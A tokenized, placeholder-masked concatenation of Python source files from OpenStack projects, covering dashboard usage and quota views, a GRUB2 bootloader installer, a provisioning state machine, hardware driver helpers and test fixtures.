getattr ( neutron_quotas . get ( resource_name ) , <EOL> '<STR_LIT>' , float ( "<STR_LIT>" ) ) <EOL> if resource_max == - <NUM_LIT:1> : <EOL> resource_max = float ( "<STR_LIT>" ) <EOL> limits [ limit_name_map [ resource_name ] ] = resource_max <EOL> def get_neutron_limits ( self ) : <EOL> if not api . base . is_service_enabled ( self . request , '<STR_LIT>' ) : <EOL> return <EOL> try : <EOL> neutron_quotas_supported = ( <EOL> api . neutron . is_quotas_extension_supported ( self . request ) ) <EOL> neutron_sg_used = ( <EOL> api . neutron . is_extension_supported ( self . request , <EOL> '<STR_LIT>' ) ) <EOL> if api . network . floating_ip_supported ( self . request ) : <EOL> self . _get_neutron_usage ( self . limits , '<STR_LIT>' ) <EOL> if neutron_sg_used : <EOL> self . _get_neutron_usage ( self . limits , '<STR_LIT>' ) <EOL> if neutron_quotas_supported : <EOL> neutron_quotas = api . neutron . tenant_quota_get ( self . request , <EOL> self . project_id ) <EOL> else : <EOL> neutron_quotas = None <EOL> except Exception : <EOL> neutron_sg_used = True <EOL> neutron_quotas = None <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , msg ) <EOL> self . _set_neutron_limit ( self . limits , neutron_quotas , '<STR_LIT>' ) <EOL> if neutron_sg_used : <EOL> self . _set_neutron_limit ( self . limits , neutron_quotas , <EOL> '<STR_LIT>' ) <EOL> def get_cinder_limits ( self ) : <EOL> """<STR_LIT>""" <EOL> if not api . cinder . is_volume_service_enabled ( self . request ) : <EOL> return <EOL> try : <EOL> self . limits . update ( api . cinder . tenant_absolute_limits ( self . request ) ) <EOL> except Exception : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> exceptions . handle ( self . request , msg ) <EOL> return <EOL> def get_limits ( self ) : <EOL> try : <EOL> self . limits = api . nova . tenant_absolute_limits ( self . request ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> self . get_neutron_limits ( ) <EOL> self . get_cinder_limits ( ) <EOL> def get_usage_list ( self , start , end ) : <EOL> return [ ] <EOL> def summarize ( self , start , end ) : <EOL> if not api . nova . extension_supported ( '<STR_LIT>' , self . request ) : <EOL> return <EOL> if start <= end and start <= self . today : <EOL> start = timezone . make_naive ( start , timezone . utc ) <EOL> end = timezone . make_naive ( end , timezone . utc ) <EOL> try : <EOL> self . usage_list = self . get_usage_list ( start , end ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> elif end < start : <EOL> messages . error ( self . request , <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> elif start > self . today : <EOL> messages . error ( self . request , <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> for project_usage in self . usage_list : <EOL> project_summary = project_usage . get_summary ( ) <EOL> for key , value in project_summary . items ( ) : <EOL> self . summary . setdefault ( key , <NUM_LIT:0> ) <EOL> self . summary [ key ] += value <EOL> def get_quotas ( self ) : <EOL> try : <EOL> self . quotas = quotas . tenant_quota_usages ( self . request ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> def csv_link ( self ) : <EOL> form = self . get_form ( ) <EOL> data = { } <EOL> if hasattr ( form , "<STR_LIT>" ) : <EOL> data = form . cleaned_data <EOL> if not ( '<STR_LIT:start>' in data and '<STR_LIT:end>' in data ) : <EOL> data = { "<STR_LIT:start>" : self . today . date ( ) , "<STR_LIT:end>" : self . today . date ( ) } <EOL> return "<STR_LIT>" % ( data [ '<STR_LIT:start>' ] , <EOL> data [ '<STR_LIT:end>' ] ) <EOL> class GlobalUsage ( BaseUsage ) : <EOL> show_deleted = True <EOL> def get_usage_list ( self , start , end ) : <EOL> return api . nova . usage_list ( self . request , start , end ) <EOL> class ProjectUsage ( BaseUsage ) : <EOL> attrs = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def get_usage_list ( self , start , end ) : <EOL> show_deleted = self . request . GET . get ( '<STR_LIT>' , <EOL> self . show_deleted ) <EOL> instances = [ ] <EOL> deleted_instances = [ ] <EOL> usage = api . nova . usage_get ( self . request , self . project_id , start , end ) <EOL> if hasattr ( usage , '<STR_LIT>' ) : <EOL> now = self . today <EOL> for server_usage in usage . server_usages : <EOL> server_uptime = server_usage [ '<STR_LIT>' ] <EOL> total_uptime = now - datetime . timedelta ( seconds = server_uptime ) <EOL> server_usage [ '<STR_LIT>' ] = total_uptime <EOL> if server_usage [ '<STR_LIT>' ] and not show_deleted : <EOL> deleted_instances . append ( server_usage ) <EOL> else : <EOL> instances . append ( server_usage ) <EOL> usage . server_usages = instances <EOL> return ( usage , ) </s>
<s> import os <EOL> import shlex <EOL> import shutil <EOL> import tempfile <EOL> from oslo_concurrency import processutils <EOL> from oslo_log import log <EOL> from ironic_python_agent import errors <EOL> from ironic_python_agent . extensions import base <EOL> from ironic_python_agent . extensions import iscsi <EOL> from ironic_python_agent import hardware <EOL> from ironic_python_agent import utils <EOL> LOG = log . getLogger ( __name__ ) <EOL> BIND_MOUNTS = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _get_partition ( device , uuid ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT>' : device , '<STR_LIT>' : uuid } ) <EOL> try : <EOL> try : <EOL> utils . execute ( '<STR_LIT>' , '<STR_LIT>' , device , attempts = <NUM_LIT:3> , <EOL> delay_on_retry = True ) <EOL> utils . execute ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> except processutils . ProcessExecutionError : <EOL> LOG . warning ( "<STR_LIT>" <EOL> "<STR_LIT>" % device ) <EOL> report = utils . execute ( '<STR_LIT>' , '<STR_LIT>' , device ) [ <NUM_LIT:0> ] <EOL> for line in report . split ( '<STR_LIT:\n>' ) : <EOL> part = { } <EOL> vals = shlex . split ( line ) <EOL> for key , val in ( v . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) for v in vals ) : <EOL> part [ key ] = val . strip ( ) <EOL> if part . get ( '<STR_LIT>' ) != '<STR_LIT>' : <EOL> continue <EOL> if part . get ( '<STR_LIT>' ) == uuid : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , { '<STR_LIT>' : uuid , '<STR_LIT>' : device } ) <EOL> return '<STR_LIT>' + part . get ( '<STR_LIT>' ) <EOL> else : <EOL> error_msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" % { '<STR_LIT>' : uuid , '<STR_LIT>' : device } ) <EOL> LOG . error ( error_msg ) <EOL> raise errors . DeviceNotFound ( error_msg ) <EOL> except processutils . ProcessExecutionError as e : <EOL> error_msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> { '<STR_LIT>' : uuid , '<STR_LIT>' : device , '<STR_LIT>' : e } ) <EOL> LOG . error ( error_msg ) <EOL> raise errors . CommandExecutionError ( error_msg ) <EOL> def _install_grub2 ( device , root_uuid , efi_system_part_uuid = None ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" , device ) <EOL> root_partition = _get_partition ( device , uuid = root_uuid ) <EOL> efi_partition = None <EOL> efi_partition_mount_point = None <EOL> try : <EOL> path = tempfile . mkdtemp ( ) <EOL> if efi_system_part_uuid : <EOL> efi_partition = _get_partition ( device , uuid = efi_system_part_uuid ) <EOL> efi_partition_mount_point = os . path . join ( path , "<STR_LIT>" ) <EOL> utils . execute ( '<STR_LIT>' , root_partition , path ) <EOL> for fs in BIND_MOUNTS : <EOL> utils . execute ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , fs , path + fs ) <EOL> utils . execute ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:none>' , path + '<STR_LIT>' ) <EOL> if efi_partition : <EOL> if not os . path . exists ( efi_partition_mount_point ) : <EOL> os . makedirs ( efi_partition_mount_point ) <EOL> utils . execute ( '<STR_LIT>' , efi_partition , efi_partition_mount_point ) <EOL> binary_name = "<STR_LIT>" <EOL> if os . path . exists ( os . path . join ( path , '<STR_LIT>' ) ) : <EOL> binary_name = "<STR_LIT>" <EOL> path_variable = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> path_variable = '<STR_LIT>' % path_variable <EOL> utils . execute ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> { '<STR_LIT:path>' : path , '<STR_LIT>' : binary_name , '<STR_LIT>' : device } , <EOL> shell = True , env_variables = { '<STR_LIT>' : path_variable } ) <EOL> utils . execute ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> { '<STR_LIT:path>' : path , '<STR_LIT>' : binary_name } , shell = True , <EOL> env_variables = { '<STR_LIT>' : path_variable } ) <EOL> LOG . info ( "<STR_LIT>" , device ) <EOL> except processutils . ProcessExecutionError as e : <EOL> error_msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' % { '<STR_LIT>' : device , '<STR_LIT>' : e } ) <EOL> LOG . error ( error_msg ) <EOL> raise errors . CommandExecutionError ( error_msg ) <EOL> finally : <EOL> umount_warn_msg = "<STR_LIT>" <EOL> umount_binds_fail = False <EOL> try : <EOL> if efi_partition : <EOL> utils . execute ( '<STR_LIT>' , efi_partition_mount_point , attempts = <NUM_LIT:3> , <EOL> delay_on_retry = True ) <EOL> except processutils . ProcessExecutionError as e : <EOL> error_msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' % e ) <EOL> LOG . error ( error_msg ) <EOL> raise errors . CommandExecutionError ( error_msg ) <EOL> for fs in BIND_MOUNTS : <EOL> try : <EOL> utils . execute ( '<STR_LIT>' , path + fs , attempts = <NUM_LIT:3> , <EOL> delay_on_retry = True ) <EOL> except processutils . ProcessExecutionError as e : <EOL> umount_binds_fail = True <EOL> LOG . warning ( umount_warn_msg , { '<STR_LIT:path>' : path + fs , '<STR_LIT:error>' : e } ) <EOL> try : <EOL> utils . execute ( '<STR_LIT>' , path + '<STR_LIT>' , attempts = <NUM_LIT:3> , <EOL> delay_on_retry = True ) <EOL> except processutils . ProcessExecutionError as e : <EOL> umount_binds_fail = True <EOL> LOG . warning ( umount_warn_msg , { '<STR_LIT:path>' : path + '<STR_LIT>' , '<STR_LIT:error>' : e } ) <EOL> if not umount_binds_fail : <EOL> try : <EOL> utils . execute ( '<STR_LIT>' , path , attempts = <NUM_LIT:3> , delay_on_retry = True ) <EOL> except processutils . ProcessExecutionError as e : <EOL> LOG . warning ( umount_warn_msg , { '<STR_LIT:path>' : path , '<STR_LIT:error>' : e } ) <EOL> else : <EOL> shutil . rmtree ( path ) <EOL> class ImageExtension ( base . BaseAgentExtension ) : <EOL> @ base . sync_command ( '<STR_LIT>' ) <EOL> def install_bootloader ( self , root_uuid , efi_system_part_uuid = None ) : <EOL> """<STR_LIT>""" <EOL> device = hardware . dispatch_to_managers ( '<STR_LIT>' ) <EOL> iscsi . clean_up ( device ) <EOL> _install_grub2 ( device , <EOL> root_uuid = root_uuid , <EOL> efi_system_part_uuid = efi_system_part_uuid ) </s>
<s> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> from ironic_python_agent . version import version_info as ipa_version <EOL> release = ipa_version . version_string_with_vcs ( ) <EOL> version = ipa_version . canonical_version_string ( ) <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from oslo_config import cfg <EOL> from oslo_log import log <EOL> from oslo_service import service <EOL> from ironic . common import service as ironic_service <EOL> CONF = cfg . CONF <EOL> def main ( ) : <EOL> ironic_service . prepare_service ( sys . argv ) <EOL> mgr = ironic_service . RPCService ( CONF . host , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> LOG = log . getLogger ( __name__ ) <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> CONF . log_opt_values ( LOG , log . DEBUG ) <EOL> launcher = service . launch ( CONF , mgr ) <EOL> launcher . wait ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from oslo_log import log as logging <EOL> from ironic . common import fsm <EOL> LOG = logging . getLogger ( __name__ ) <EOL> VERBS = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> """<STR_LIT>""" <EOL> NOSTATE = None <EOL> """<STR_LIT>""" <EOL> ENROLL = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> VERIFYING = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> MANAGEABLE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> AVAILABLE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> ACTIVE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DEPLOYWAIT = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DEPLOYING = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DEPLOYFAIL = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DEPLOYDONE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DELETING = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DELETED = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> CLEANING = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> CLEANWAIT = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> CLEANFAIL = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> ERROR = '<STR_LIT:error>' <EOL> """<STR_LIT>""" <EOL> REBUILD = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> INSPECTING = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> INSPECTFAIL = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> UPDATE_ALLOWED_STATES = ( DEPLOYFAIL , INSPECTING , INSPECTFAIL , CLEANFAIL , ERROR , <EOL> VERIFYING ) <EOL> """<STR_LIT>""" <EOL> DELETE_ALLOWED_STATES = ( AVAILABLE , NOSTATE , MANAGEABLE , ENROLL ) <EOL> """<STR_LIT>""" <EOL> STABLE_STATES = ( ENROLL , MANAGEABLE , AVAILABLE , ACTIVE , ERROR ) <EOL> """<STR_LIT>""" <EOL> POWER_ON = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> POWER_OFF = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> REBOOT = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> def on_exit ( old_state , event ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" , <EOL> old_state , event ) <EOL> def on_enter ( new_state , event ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" , <EOL> new_state , event ) <EOL> watchers = { } <EOL> watchers [ '<STR_LIT>' ] = on_exit <EOL> watchers [ '<STR_LIT>' ] = on_enter <EOL> machine = fsm . FSM ( ) <EOL> for state in STABLE_STATES : <EOL> machine . add_state ( state , stable = True , ** watchers ) <EOL> machine . add_state ( VERIFYING , target = MANAGEABLE , ** watchers ) <EOL> machine . add_state ( DEPLOYING , target = ACTIVE , ** watchers ) <EOL> machine . add_state ( DEPLOYWAIT , target = ACTIVE , ** watchers ) <EOL> machine . add_state ( DEPLOYFAIL , target = ACTIVE , ** watchers ) <EOL> machine . add_state ( CLEANING , target = AVAILABLE , ** watchers ) <EOL> machine . add_state ( CLEANWAIT , target = AVAILABLE , ** watchers ) <EOL> machine . add_state ( CLEANFAIL , target = AVAILABLE , ** watchers ) <EOL> machine . add_state ( DELETING , target = AVAILABLE , ** watchers ) <EOL> machine . add_transition ( AVAILABLE , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_state ( INSPECTING , target = MANAGEABLE , ** watchers ) <EOL> machine . add_state ( INSPECTFAIL , target = MANAGEABLE , ** watchers ) <EOL> machine . add_transition ( DEPLOYING , DEPLOYFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYFAIL , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYFAIL , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYING , DEPLOYWAIT , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYWAIT , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYWAIT , DEPLOYFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYING , ACTIVE , '<STR_LIT>' ) <EOL> machine . add_transition ( ACTIVE , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_transition ( ACTIVE , DELETING , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYWAIT , DELETING , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYFAIL , DELETING , '<STR_LIT>' ) <EOL> machine . add_transition ( DELETING , ERROR , '<STR_LIT:error>' ) <EOL> machine . add_transition ( DELETING , CLEANING , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANING , AVAILABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANING , CLEANFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANWAIT , CLEANFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANWAIT , CLEANFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANING , CLEANWAIT , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANWAIT , CLEANING , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANFAIL , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( MANAGEABLE , CLEANING , '<STR_LIT>' ) <EOL> machine . add_transition ( MANAGEABLE , CLEANING , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANING , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( AVAILABLE , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( ERROR , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_transition ( ERROR , DELETING , '<STR_LIT>' ) <EOL> machine . add_transition ( MANAGEABLE , INSPECTING , '<STR_LIT>' ) <EOL> machine . add_transition ( INSPECTING , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( INSPECTING , INSPECTFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( INSPECTFAIL , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( INSPECTFAIL , INSPECTING , '<STR_LIT>' ) <EOL> machine . add_transition ( ENROLL , VERIFYING , '<STR_LIT>' ) <EOL> machine . add_transition ( VERIFYING , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( VERIFYING , ENROLL , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> from sqlalchemy import Boolean , String <EOL> from sqlalchemy . sql import table , column , null <EOL> port = table ( '<STR_LIT>' , <EOL> column ( '<STR_LIT>' , String ( <NUM_LIT> ) ) , <EOL> column ( '<STR_LIT>' , Boolean ( ) ) ) <EOL> def upgrade ( ) : <EOL> op . execute ( <EOL> port . update ( ) . where ( <EOL> port . c . pxe_enabled == null ( ) ) . values ( <EOL> { '<STR_LIT>' : True } ) ) </s>
<s> """<STR_LIT>""" <EOL> from oslo_utils import importutils <EOL> from ironic . common import exception <EOL> from ironic . common . i18n import _ <EOL> from ironic . common import utils <EOL> drac_client = importutils . try_import ( '<STR_LIT>' ) <EOL> drac_constants = importutils . try_import ( '<STR_LIT>' ) <EOL> REQUIRED_PROPERTIES = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } <EOL> OPTIONAL_PROPERTIES = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> } <EOL> COMMON_PROPERTIES = REQUIRED_PROPERTIES . copy ( ) <EOL> COMMON_PROPERTIES . update ( OPTIONAL_PROPERTIES ) <EOL> def parse_driver_info ( node ) : <EOL> """<STR_LIT>""" <EOL> driver_info = node . driver_info <EOL> parsed_driver_info = { } <EOL> error_msgs = [ ] <EOL> for param in REQUIRED_PROPERTIES : <EOL> try : <EOL> parsed_driver_info [ param ] = str ( driver_info [ param ] ) <EOL> except KeyError : <EOL> error_msgs . append ( _ ( "<STR_LIT>" ) % param ) <EOL> except UnicodeEncodeError : <EOL> error_msgs . append ( _ ( "<STR_LIT>" ) % param ) <EOL> parsed_driver_info [ '<STR_LIT>' ] = driver_info . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> try : <EOL> parsed_driver_info [ '<STR_LIT>' ] = str ( driver_info . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> except UnicodeEncodeError : <EOL> error_msgs . append ( _ ( "<STR_LIT>" ) ) <EOL> try : <EOL> parsed_driver_info [ '<STR_LIT>' ] = str ( <EOL> driver_info . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if parsed_driver_info [ '<STR_LIT>' ] not in [ '<STR_LIT:http>' , '<STR_LIT>' ] : <EOL> error_msgs . append ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> except UnicodeEncodeError : <EOL> error_msgs . append ( _ ( "<STR_LIT>" ) ) <EOL> if error_msgs : <EOL> msg = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % '<STR_LIT:\n>' . join ( error_msgs ) ) <EOL> raise exception . InvalidParameterValue ( msg ) <EOL> port = parsed_driver_info [ '<STR_LIT>' ] <EOL> parsed_driver_info [ '<STR_LIT>' ] = utils . validate_network_port ( <EOL> port , '<STR_LIT>' ) <EOL> return parsed_driver_info <EOL> def get_drac_client ( node ) : <EOL> """<STR_LIT>""" <EOL> driver_info = parse_driver_info ( node ) <EOL> client = drac_client . DRACClient ( driver_info [ '<STR_LIT>' ] , <EOL> driver_info [ '<STR_LIT>' ] , <EOL> driver_info [ '<STR_LIT>' ] , <EOL> driver_info [ '<STR_LIT>' ] , <EOL> driver_info [ '<STR_LIT>' ] , <EOL> driver_info [ '<STR_LIT>' ] ) <EOL> return client </s>
<s> """<STR_LIT>""" <EOL> from oslo_log import log <EOL> from ironic . common import exception <EOL> from ironic . common . i18n import _ <EOL> from ironic . common . i18n import _LE <EOL> from ironic . common import states <EOL> from ironic . conductor import task_manager <EOL> from ironic . drivers import base <EOL> from ironic . drivers . modules . msftocs import common as msftocs_common <EOL> from ironic . drivers . modules . msftocs import msftocsclient <EOL> LOG = log . getLogger ( __name__ ) <EOL> POWER_STATES_MAP = { <EOL> msftocsclient . POWER_STATUS_ON : states . POWER_ON , <EOL> msftocsclient . POWER_STATUS_OFF : states . POWER_OFF , <EOL> } <EOL> class MSFTOCSPower ( base . PowerInterface ) : <EOL> def get_properties ( self ) : <EOL> """<STR_LIT>""" <EOL> return msftocs_common . get_properties ( ) <EOL> def validate ( self , task ) : <EOL> """<STR_LIT>""" <EOL> msftocs_common . parse_driver_info ( task . node ) <EOL> def get_power_state ( self , task ) : <EOL> """<STR_LIT>""" <EOL> client , blade_id = msftocs_common . get_client_info ( <EOL> task . node . driver_info ) <EOL> return POWER_STATES_MAP [ client . get_blade_state ( blade_id ) ] <EOL> @ task_manager . require_exclusive_lock <EOL> def set_power_state ( self , task , pstate ) : <EOL> """<STR_LIT>""" <EOL> client , blade_id = msftocs_common . get_client_info ( <EOL> task . node . driver_info ) <EOL> try : <EOL> if pstate == states . POWER_ON : <EOL> client . set_blade_on ( blade_id ) <EOL> elif pstate == states . POWER_OFF : <EOL> client . set_blade_off ( blade_id ) <EOL> else : <EOL> raise exception . InvalidParameterValue ( <EOL> _ ( '<STR_LIT>' ) % pstate ) <EOL> except exception . MSFTOCSClientApiException as ex : <EOL> LOG . exception ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { "<STR_LIT>" : pstate , "<STR_LIT>" : ex } ) <EOL> raise exception . PowerStateFailure ( pstate = pstate ) <EOL> @ task_manager . require_exclusive_lock <EOL> def reboot ( self , task ) : <EOL> """<STR_LIT>""" <EOL> client , blade_id = msftocs_common . get_client_info ( <EOL> task . node . driver_info ) <EOL> try : <EOL> client . set_blade_power_cycle ( blade_id ) <EOL> except exception . MSFTOCSClientApiException as ex : <EOL> LOG . exception ( _LE ( "<STR_LIT>" ) , <EOL> { "<STR_LIT>" : ex } ) <EOL> raise exception . PowerStateFailure ( pstate = states . REBOOT ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import os <EOL> import sys <EOL> import tempfile <EOL> import eventlet <EOL> eventlet . monkey_patch ( os = False ) <EOL> import fixtures <EOL> from oslo_config import cfg <EOL> from oslo_config import fixture as config_fixture <EOL> from oslo_log import log as logging <EOL> import testtools <EOL> from ironic . common import config as ironic_config <EOL> from ironic . common import context as ironic_context <EOL> from ironic . common import hash_ring <EOL> from ironic . objects import base as objects_base <EOL> from ironic . tests . unit import policy_fixture <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT:host>' , '<STR_LIT>' ) <EOL> logging . register_options ( CONF ) <EOL> logging . setup ( CONF , '<STR_LIT>' ) <EOL> class ReplaceModule ( fixtures . Fixture ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , new_value ) : <EOL> self . name = name <EOL> self . new_value = new_value <EOL> def _restore ( self , old_value ) : <EOL> sys . modules [ self . name ] = old_value <EOL> def setUp ( self ) : <EOL> super ( ReplaceModule , self ) . setUp ( ) <EOL> old_value = sys . modules . get ( self . name ) <EOL> sys . modules [ self . name ] = self . new_value <EOL> self . addCleanup ( self . _restore , old_value ) <EOL> class TestingException ( Exception ) : <EOL> pass <EOL> class TestCase ( testtools . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TestCase , self ) . setUp ( ) <EOL> self . context = ironic_context . get_admin_context ( ) <EOL> test_timeout = os . environ . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> try : <EOL> test_timeout = int ( test_timeout ) <EOL> except ValueError : <EOL> test_timeout = <NUM_LIT:0> <EOL> if test_timeout > <NUM_LIT:0> : <EOL> self . useFixture ( fixtures . Timeout ( test_timeout , gentle = True ) ) <EOL> self . useFixture ( fixtures . NestedTempfile ( ) ) <EOL> self . useFixture ( fixtures . TempHomeDir ( ) ) <EOL> if ( os . environ . get ( '<STR_LIT>' ) == '<STR_LIT:True>' or <EOL> os . environ . get ( '<STR_LIT>' ) == '<STR_LIT:1>' ) : <EOL> stdout = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stdout ) ) <EOL> if ( os . environ . get ( '<STR_LIT>' ) == '<STR_LIT:True>' or <EOL> os . environ . get ( '<STR_LIT>' ) == '<STR_LIT:1>' ) : <EOL> stderr = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stderr ) ) <EOL> self . log_fixture = self . useFixture ( fixtures . FakeLogger ( ) ) <EOL> self . _set_config ( ) <EOL> objects_base . IronicObject . indirection_api = None <EOL> self . _base_test_obj_backup = copy . copy ( <EOL> objects_base . IronicObjectRegistry . obj_classes ( ) ) <EOL> self . addCleanup ( self . _restore_obj_registry ) <EOL> self . addCleanup ( self . _clear_attrs ) <EOL> self . addCleanup ( hash_ring . HashRingManager ( ) . reset ) <EOL> self . useFixture ( fixtures . EnvironmentVariable ( '<STR_LIT>' ) ) <EOL> self . policy = self . useFixture ( policy_fixture . PolicyFixture ( ) ) <EOL> def _set_config ( self ) : <EOL> self . cfg_fixture = self . useFixture ( config_fixture . Config ( CONF ) ) <EOL> self . config ( use_stderr = False , <EOL> fatal_exception_format_errors = True , <EOL> tempdir = tempfile . tempdir ) <EOL> self . set_defaults ( host = '<STR_LIT>' , <EOL> verbose = 